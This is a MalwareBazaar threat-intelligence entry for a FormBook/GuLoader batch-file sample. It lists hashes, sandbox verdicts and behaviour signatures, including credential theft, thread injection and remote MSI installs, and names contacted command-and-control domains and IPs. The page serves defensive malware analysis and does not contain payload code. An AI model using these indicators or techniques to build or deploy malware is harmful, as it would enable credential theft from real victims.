MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 78a0226aca4aaf42bc35f67b535bbb46607d71781a20facba7261db93c7a7d6f. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Formbook


Vendor detections: 13


Intelligence 13 IOCs YARA File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: 78a0226aca4aaf42bc35f67b535bbb46607d71781a20facba7261db93c7a7d6f
SHA3-384 hash: 814a0f9be3e7120de8ec7a6bf179dd096dababa7159ffb6914686055da88a7be822f04ebb44c0809571cadf9dc2b966f
SHA1 hash: a5159f8847f2f1a0902f92b75700ac09af806a68
MD5 hash: 98f890f320c9043a0bc3398896b838f2
humanhash: yellow-washington-carbon-kilo
File name:25SZJA tervezet elérhetősége_a·pdf.bat
Download: download sample
Signature Formbook
Create hunting rule
File size:3'013 bytes
First seen:2026-03-24 08:38:57 UTC
Last seen:Never
File type:Batch (bat) bat
MIME type:text/plain
ssdeep 48:zuVKMlx9qYZIiXJCXSb3YzklK4b7du7Z/d8wacMbohO5wNMBgBgOgS3D7mDB7JO:irx9qYZ55CX6YzmK4g0wacMbouwN8egW
Threatray 2'463 similar samples on MalwareBazaar
TLSH T1FE51B8B60B6322E13D520175F3DA074D9222A008834E478736EC549DADE27BC4333EF6
Magika txt
Reporter smica83
Tags:bat FormBook HUN

Intelligence

File Origin
# of uploads :
1
# of downloads :
71
Origin country :
HU HU
Vendor Threat Intelligence
No detections
Malware family:
n/a
ID:
1
File name:
_78a0226aca4aaf42bc35f67b535bbb46607d71781a20facba7261db93c7a7d6f.txt
Verdict:
Malicious activity
Analysis date:
2026-03-24 08:40:11 UTC
Tags:
n/a
Link:
https://app.any.run/tasks/29131e0c-5f53-4e9d-b576-7f992438cfe0

Note:
ANY.RUN is an interactive sandbox that analyzes all user actions rather than an uploaded sample
Detection:
n/a
Link:
https://www.capesandbox.com/analysis/58922/
Verdict:
Clean
Score:
70%
Link:
https://cyber-fortress.com/docs/result/index.php?id=69c24db7390b996474132de5
Tags:
n/a
Result
Verdict:
Clean
Maliciousness:

Behaviour
Connection attempt
Launching a process
Сreating synchronization primitives
DNS request
Verdict:
Likely Malicious
Threat level:
  7.5/10
Confidence:
100%
Tags:
base64 cloudeye encrypted obfuscated powershell powershell
Link:
https://www.filescan.io/uploads/69c24db4ab95f82184f7696a/reports/c15be1ef-e402-449a-8585-c3ca79b489e9/overview
Verdict:
Malicious
Labled as:
Trojan.Generic
Link:
https://www.hybrid-analysis.com/sample/78a0226aca4aaf42bc35f67b535bbb46607d71781a20facba7261db93c7a7d6f
Verdict:
Malicious
File Type:
ps1
Detections:
Trojan-Downloader.PowerShell.Agent.sb
Link:
https://opentip.kaspersky.com/78a0226aca4aaf42bc35f67b535bbb46607d71781a20facba7261db93c7a7d6f/results?tab=lookup
Result
Threat name:
FormBook, GuLoader
Create hunting rule
Detection:
malicious
Classification:
troj.spyw.evad
Score:
100 / 100
Link:
https://www.joesandbox.com/analysis/1888049
Signature
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a MSI (Microsoft Installer) remotely
Joe Sandbox ML detected suspicious sample
Malicious sample detected (through community Yara rule)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Multi AV Scanner detection for submitted file
Obfuscated command line found
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Potential PowerShell Command Line Obfuscation
Suricata IDS alerts for network traffic
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Unusual module load detection (module proxying)
Writes to foreign memory regions
Yara detected FormBook
Yara detected GuLoader
Behaviour
Behavior Graph:
Download SVG
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1888049 Sample: 25SZJA tervezet el#U00e9rhe... Startdate: 24/03/2026 Architecture: WINDOWS Score: 100 76 www.3701157.xyz 2->76 78 www.rightnova.site 2->78 80 17 other IPs or domains 2->80 94 Suricata IDS alerts for network traffic 2->94 96 Malicious sample detected (through community Yara rule) 2->96 98 Multi AV Scanner detection for submitted file 2->98 102 7 other signatures 2->102 11 powershell.exe 18 2->11         started        14 powershell.exe 13 2->14         started        16 powershell.exe 14 2->16         started        18 cmd.exe 1 2->18         started        signatures3 100 Performs DNS queries to domains with low reputation 76->100 process4 signatures5 130 Suspicious powershell command line found 11->130 132 Obfuscated command line found 11->132 134 Writes to foreign memory regions 11->134 136 4 other signatures 11->136 20 msiexec.exe 2 7 11->20         started        23 msiexec.exe 11->23         started        25 conhost.exe 11->25         started        27 powershell.exe 15 14->27         started        29 conhost.exe 14->29         started        31 powershell.exe 15 16->31         started        33 conhost.exe 16->33         started        35 powershell.exe 14 18 18->35         started        38 conhost.exe 18->38         started        process6 dnsIp7 104 Obfuscated command line found 20->104 106 Maps a DLL or memory area into another process 20->106 108 Installs a MSI (Microsoft Installer) remotely 20->108 40 JnNh9XJMY7b3ux.exe 20->40 injected 43 cmd.exe 1 20->43         started        45 msiexec.exe 20->45         started        110 Unusual module load detection (module proxying) 23->110 112 Writes to foreign memory regions 27->112 47 msiexec.exe 27->47         started        50 msiexec.exe 27->50         started        52 msiexec.exe 31->52         started        54 msiexec.exe 31->54         started        82 drive.google.com 142.250.188.14, 443, 49718, 49728 GOOGLEUS United States 35->82 84 drive.usercontent.google.com 142.251.211.161, 443, 49719, 49729 GOOGLEUS United States 35->84 114 Found suspicious powershell code related to unpacking or dynamic code loading 35->114 56 conhost.exe 35->56         started        signatures8 process9 dnsIp10 116 Maps a DLL or memory area into another process 40->116 58 comp.exe 13 40->58         started        118 Obfuscated command line found 43->118 61 conhost.exe 43->61         started        63 reg.exe 1 1 43->63         started        92 142.251.211.174, 443, 49733 GOOGLEUS United States 47->92 120 Installs a MSI (Microsoft Installer) remotely 47->120 65 msiexec.exe 47->65         started        signatures11 process12 signatures13 122 Tries to steal Mail credentials (via file / registry access) 58->122 124 Tries to harvest and steal browser information (history, passwords, etc) 58->124 126 Modifies the context of a thread in another process (thread injection) 58->126 128 4 other signatures 58->128 67 70hfTjpfBq8.exe 58->67 injected 70 chrome.exe 58->70         started        72 firefox.exe 58->72         started        process14 dnsIp15 86 beyazmeramdis.com 78.142.209.251, 49743, 49744, 49745 VERIDYENVeridyenBilisimTeknolojileriSanayiveTicaretLi Turkey 67->86 88 3701157.xyz 68.65.121.158, 49732, 80 NAMECHEAP-NETUS United States 67->88 90 2 other IPs or domains 67->90 74 WerFault.exe 70->74         started        process16
Score:
100%
Verdict:
Malware
File Type:
SCRIPT
Link:
https://malprob.io/report/78a0226aca4aaf42bc35f67b535bbb46607d71781a20facba7261db93c7a7d6f
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/78a0226aca4aaf42bc35f67b535bbb46607d71781a20facba7261db93c7a7d6f/
Verdict:
Malicious
Threat:
Trojan-Downloader.PowerShell.Agent
Link:
https://tip.neiki.dev/file/78a0226aca4aaf42bc35f67b535bbb46607d71781a20facba7261db93c7a7d6f
Threat name:
Script-PowerShell.Trojan.GuLoader
Create hunting rule
Status:
Malicious
First seen:
2026-03-23 12:11:36 UTC
File Type:
Text
AV detection:
7 of 24 (29.17%)
Threat level:
  5/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=pcqce2wkjkxufpbv6z5vgw53izqh24lydiqpvs5heyo3spd2pvxq._file
Verdict:
malicious
Label(s):
formbook
Create hunting rule
Similar samples:
15f59282ba4232125d82540bcaf82e77047b209ca34c092c84061cd43e835ace
Formbook
161a1575e84ea9637ad7d7905c008f06b2146dc5d46bb44b76763601d26c39e6
Formbook
46ec685b32226005716e90e45da8de2d312975d5a9004036638f6247dbda910c
Formbook
5ca2ad629da920bdd3ee4316019a390d254df0bda2918e9fd57ff623d7fba5a3
Formbook
735d0d3e060109a3bbd3d986a45a3d1fbc50d51fd4231c330dbb94ee8aa7576b
Formbook
abd99bf17b7cf13044a064cfd6d73d38a19706ba46222e05e4893b188fbe9cd9
Formbook
b0e8491d0558fe31d0e2f591e7c09beb20321b5551b008dec47da8c1b14c28ca
Formbook
e112330656ad337612b9e6e468af907b3b8cd11b49de07aeeb3aa91db54acbd3
Formbook
error
Formbook
f6469663f0a38647f54764309023eefa956a37e381b7b6fabe2882b75464bd8b
Formbook
fdfac85d4b1e626b1ef7645afd5ddc84ed619d705a9b87b6d8e3560fa295a57e
Formbook
+ 2'453 additional samples on MalwareBazaar
Result
Malware family:
guloader
Create hunting rule
Score:
  10/10
Tags:
family:guloader discovery downloader execution persistence privilege_escalation
Link:
https://tria.ge/reports/260324-kkemvscz8x/
Behaviour
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Event Triggered Execution: Installer Packages
System Location Discovery: System Language Discovery
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of NtSetInformationThreadHideFromDebugger
Adds Run key to start application
Command and Scripting Interpreter: PowerShell
Contacts third-party web service commonly abused for C2
Use of msiexec (install) with remote resource
Badlisted process makes network request
Guloader family
Guloader,Cloudeye
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Malicious File
Score:
1.00
Link:
https://yomi.yoroi.company/submissions/78a0226aca4aaf42bc35f67b535bbb46607d71781a20facba7261db93c7a7d6f

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Cape
Cape
https://www.capesandbox.com/analysis/58922/

Comments